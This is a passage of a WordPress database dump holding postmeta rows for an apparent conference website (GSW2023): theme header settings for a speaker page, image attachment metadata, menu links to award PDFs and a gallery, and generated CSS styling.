(37234,5468,'_dt_teammate_options_linkedin',''),
(37235,5468,'_dt_teammate_options_vimeo',''),
(37236,5468,'_dt_teammate_options_tumbler',''),
(37237,5468,'_dt_teammate_options_pinterest',''),
(37238,5468,'_dt_teammate_options_devian',''),
(37239,5468,'_dt_teammate_options_skype',''),
(37240,5468,'_dt_teammate_options_github',''),
(37241,5468,'_dt_teammate_options_instagram',''),
(37242,5468,'_dt_teammate_options_stumbleupon',''),
(37243,5468,'_dt_teammate_options_behance',''),
(37244,5468,'_dt_teammate_options_px-500',''),
(37245,5468,'_dt_teammate_options_tripedvisor',''),
(37246,5468,'_dt_teammate_options_vk',''),
(37247,5468,'_dt_teammate_options_foursquare',''),
(37248,5468,'_dt_teammate_options_xing',''),
(37249,5468,'_dt_teammate_options_weibo',''),
(37250,5468,'_dt_teammate_options_odnoklassniki',''),
(37251,5468,'_dt_teammate_options_research-gate',''),
(37252,5468,'_dt_teammate_options_yelp',''),
(37253,5468,'_dt_teammate_options_blogger',''),
(37254,5468,'_dt_teammate_options_soundcloud',''),
(37255,5468,'_dt_teammate_options_viber',''),
(37256,5468,'_dt_teammate_options_whatsapp',''),
(37257,5468,'_dt_teammate_options_reddit',''),
(37258,5468,'_dt_teammate_options_snapchat',''),
(37259,5468,'_dt_teammate_options_telegram',''),
(37260,5468,'_wp_old_slug','5468'),
(37262,5471,'_wp_attached_file','2023/09/nasr-1.jpg'),
(37263,5471,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:130;s:6:\"height\";i:160;s:4:\"file\";s:18:\"2023/09/nasr-1.jpg\";s:8:\"filesize\";i:47095;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"nasr-1-130x150.jpg\";s:5:\"width\";i:130;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7774;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(37264,5471,'fb_filesize','47095'),
(37266,5468,'_dt_fancy_header_layout_heading',''),
(37267,5468,'_dt_fancy_header_title_aligment','center'),
(37268,5468,'_dt_fancy_header_height','300'),
(37269,5468,'_dt_fancy_header_padding-top','0px'),
(37270,5468,'_dt_fancy_header_padding-bottom','0px'),
(37271,5468,'_dt_fancy_header_breadcrumbs_heading',''),
(37272,5468,'_dt_fancy_header_breadcrumbs','disabled'),
(37273,5468,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(37274,5468,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(37275,5468,'_dt_fancy_header_title_heading',''),
(37276,5468,'_dt_fancy_header_title_mode','custom'),
(37277,5468,'_dt_fancy_header_title','Prof. Mohamad Abou El Nasr'),
(37278,5468,'_dt_fancy_header_title_font_size','30'),
(37279,5468,'_dt_fancy_header_title_line_height','36'),
(37280,5468,'_dt_fancy_header_text_transform','none'),
(37281,5468,'_dt_fancy_header_title_color_mode','color'),
(37282,5468,'_dt_fancy_header_title_color','#ffffff'),
(37283,5468,'_dt_fancy_header_subtitle_heading',''),
(37284,5468,'_dt_fancy_header_subtitle','University of Guelph'),
(37285,5468,'_dt_fancy_header_subtitle_font_size','18'),
(37286,5468,'_dt_fancy_header_subtitle_line_height','26'),
(37287,5468,'_dt_fancy_header_subtitle_text_transform','none'),
(37288,5468,'_dt_fancy_header_subtitle_color_mode','color'),
(37289,5468,'_dt_fancy_header_subtitle_color','#ffffff'),
(37290,5468,'_dt_fancy_header_bg_heading',''),
(37291,5468,'_dt_fancy_header_bg_color','#222222'),
(37292,5468,'_dt_fancy_header_bg_image_origin','custom'),
(37293,5468,'_dt_fancy_header_bg_image','a:0:{}'),
(37294,5468,'_dt_fancy_header_bg_repeat','no-repeat'),
(37295,5468,'_dt_fancy_header_bg_position_x','center'),
(37296,5468,'_dt_fancy_header_bg_position_y','center'),
(37297,5468,'_dt_fancy_header_bg_fullscreen','1'),
(37298,5468,'_dt_fancy_header_bg_overlay','0'),
(37299,5468,'_dt_fancy_header_overlay_color','#000'),
(37300,5468,'_dt_fancy_header_bg_overlay_opacity','50'),
(37301,5468,'_dt_fancy_header_scroll_effect','default'),
(37302,5468,'_dt_fancy_header_bg_parallax','0.5'),
(37303,5468,'_dt_fancy_header_responsiveness_heading',''),
(37304,5468,'_dt_fancy_header_responsiveness','disabled'),
(37305,5468,'_dt_fancy_header_responsiveness_switch','778px'),
(37306,5468,'_dt_fancy_header_responsive_height','70'),
(37307,5468,'_dt_fancy_header_responsive_font_size','30'),
(37308,5468,'_dt_fancy_header_responsive_title_line_height','38'),
(37309,5468,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(37310,5468,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(37311,5468,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(37312,5468,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(37315,5468,'_wp_old_slug','prof-mohamad-abou-el-nasr'),
(37316,5473,'_wp_attached_file','2023/09/nasr-2.jpg'),
(37317,5473,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:130;s:6:\"height\";i:160;s:4:\"file\";s:18:\"2023/09/nasr-2.jpg\";s:8:\"filesize\";i:47095;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"nasr-2-130x150.jpg\";s:5:\"width\";i:130;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7774;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(37318,5473,'fb_filesize','47095'),
(37319,5473,'dt-video-url',''),
(37320,5473,'dt-img-link',''),
(37321,5473,'dt-img-hide-title','0'),
(37322,5474,'_wp_attached_file','2023/09/nasr-3.jpg'),
(37323,5474,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:130;s:6:\"height\";i:160;s:4:\"file\";s:18:\"2023/09/nasr-3.jpg\";s:8:\"filesize\";i:47095;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"nasr-3-130x150.jpg\";s:5:\"width\";i:130;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7774;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(37324,5474,'fb_filesize','47095'),
(37325,5468,'_thumbnail_id','5474'),
(37327,5476,'_menu_item_type','custom'),
(37328,5476,'_menu_item_menu_item_parent','5460'),
(37329,5476,'_menu_item_object_id','5476'),
(37330,5476,'_menu_item_object','custom'),
(37331,5476,'_menu_item_target','_blank'),
(37332,5476,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(37333,5476,'_menu_item_xfn',''),
(37334,5476,'_menu_item_url','https://gsw2023.com/wp-content/uploads/2023/09/The%20Best.pdf'),
(37336,5477,'_menu_item_type','custom'),
(37337,5477,'_menu_item_menu_item_parent','5460'),
(37338,5477,'_menu_item_object_id','5477'),
(37339,5477,'_menu_item_object','custom'),
(37340,5477,'_menu_item_target','_blank'),
(37341,5477,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(37342,5477,'_menu_item_xfn',''),
(37343,5477,'_menu_item_url','https://gsw2023.com/wp-content/uploads/2023/09/Best%20presentation%20award%20GSW2023.pdf'),
(37345,2082,'_wp_old_date','2023-09-04'),
(37346,2083,'_wp_old_date','2023-09-04'),
(37347,2346,'_wp_old_date','2023-09-04'),
(37348,2348,'_wp_old_date','2023-09-04'),
(37349,2349,'_wp_old_date','2023-09-04'),
(37350,2350,'_wp_old_date','2023-09-04'),
(37351,2351,'_wp_old_date','2023-09-04'),
(37352,2904,'_wp_old_date','2023-09-04'),
(37353,3556,'_wp_old_date','2023-09-04'),
(37354,4852,'_wp_old_date','2023-09-04'),
(37355,2084,'_wp_old_date','2023-09-04'),
(37356,2352,'_wp_old_date','2023-09-04'),
(37357,5448,'_wp_old_date','2023-09-04'),
(37358,5117,'_wp_old_date','2023-09-04'),
(37359,5118,'_wp_old_date','2023-09-04'),
(37360,3671,'_wp_old_date','2023-09-04'),
(37361,5119,'_wp_old_date','2023-09-04'),
(37362,5120,'_wp_old_date','2023-09-04'),
(37363,2281,'_wp_old_date','2023-09-04'),
(37364,2353,'_wp_old_date','2023-09-04'),
(37365,2354,'_wp_old_date','2023-09-04'),
(37366,2355,'_wp_old_date','2023-09-04'),
(37367,2282,'_wp_old_date','2023-09-04'),
(37368,2283,'_wp_old_date','2023-09-04'),
(37369,3645,'_wp_old_date','2023-09-04'),
(37370,2284,'_wp_old_date','2023-09-04'),
(37371,2921,'_wp_old_date','2023-09-04'),
(37372,2285,'_wp_old_date','2023-09-04'),
(37373,5402,'_wp_old_date','2023-09-04'),
(37374,5437,'_wp_old_date','2023-09-04'),
(37375,2356,'_wp_old_date','2023-09-04'),
(37376,2357,'_wp_old_date','2023-09-04'),
(37377,2359,'_wp_old_date','2023-09-04'),
(37378,2358,'_wp_old_date','2023-09-04'),
(37379,2286,'_wp_old_date','2023-09-04'),
(37380,5460,'_wp_old_date','2023-09-04'),
(37381,5479,'_wpb_post_custom_layout','default'),
(37382,5479,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37383,5479,'_wpb_shortcodes_custom_css_updated','1'),
(37384,5480,'_wpb_post_custom_layout','default'),
(37385,5480,'_wpb_shortcodes_custom_css','.vc_custom_1692141164274{margin-top: -50px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1692141209167{margin-top: -70px !important;}.vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}.vc_custom_1692155587524{margin-left: -50px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1692141338959{margin-top: 0px !important;}.vc_custom_1692141365647{margin-top: 35px !important;}.vc_custom_1692141399321{margin-top: 45px !important;}.vc_custom_1692141414655{margin-top: 0px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692144968858{margin-top: 20px !important;}.vc_custom_1692144942219{margin-top: -100px !important;}.vc_custom_1680403783341{margin-top: -15px !important;}.vc_custom_1692145343386{margin-top: -130px !important;}.vc_custom_1692145725824{margin-top: -90px !important;}.vc_custom_1692145894928{margin-top: -60px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1680403868499{margin-top: -35px !important;}.vc_custom_1687096091997{margin-top: 125px !important;}.vc_custom_1692145428379{margin-top: 60px !important;}.vc_custom_1687095942758{margin-top: 137px !important;}.vc_custom_1687219836213{margin-top: -px !important;}.vc_custom_1688951584642{margin-top: 45px !important;}.vc_custom_1688951717998{margin-top: 90px !important;}.vc_custom_1687095881067{margin-top: 20px !important;}.vc_custom_1690459872519{margin-top: 50px !important;}.vc_custom_1692145657186{margin-top: 50px !important;}.vc_custom_1688951105389{margin-top: 50px !important;}.vc_custom_1687096291206{margin-top: 50px !important;}.vc_custom_1692145841186{margin-top: 50px !important;}.vc_custom_1687096532104{margin-top: 88px !important;}.vc_custom_1690251276274{margin-top: 50px !important;}.vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690452445334{margin-top: 50px !important;}.vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1690600884765{margin-top: 50px !important;}.vc_custom_1691508515384{margin-top: 50px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}.vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687711659617{margin-top: 0px !important;}.vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}.vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}.vc_custom_1687553105001{margin-top: 0px !important;}.vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1687570624975{margin-top: 140px !important;}.vc_custom_1687570128641{margin-top: -70px !important;}.vc_custom_1692140427657{margin-top: 50px !important;}.vc_custom_1687570551843{margin-top: 50px !important;}.vc_custom_1686320668385{margin-top: -25px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(37386,5480,'_wpb_shortcodes_custom_css_updated','1'),
(37387,5481,'_menu_item_type','custom'),
(37388,5481,'_menu_item_menu_item_parent','2350'),
(37389,5481,'_menu_item_object_id','5481'),
(37390,5481,'_menu_item_object','custom'),
(37391,5481,'_menu_item_target','_blank'),
(37392,5481,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(37393,5481,'_menu_item_xfn',''),
(37394,5481,'_menu_item_url','https://st33239.ispot.cc/gallery/index.php/'),
(37408,5430,'_pingme','1'),
(37409,5430,'_encloseme','1'),
(37410,5364,'_pingme','1'),
(37411,5364,'_encloseme','1'),
(37412,5132,'_pingme','1'),
(37413,5132,'_encloseme','1'),
(37414,5139,'_pingme','1'),
(37415,5139,'_encloseme','1'),
(37416,5122,'_pingme','1'),
(37417,5122,'_encloseme','1'),
(37418,5417,'_pingme','1'),
(37419,5417,'_encloseme','1'),
(37420,5383,'_pingme','1'),
(37421,5383,'_encloseme','1'),
(37422,5430,'the7_shortcodes_dynamic_css','a:2:{i:0;s:0:\"\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  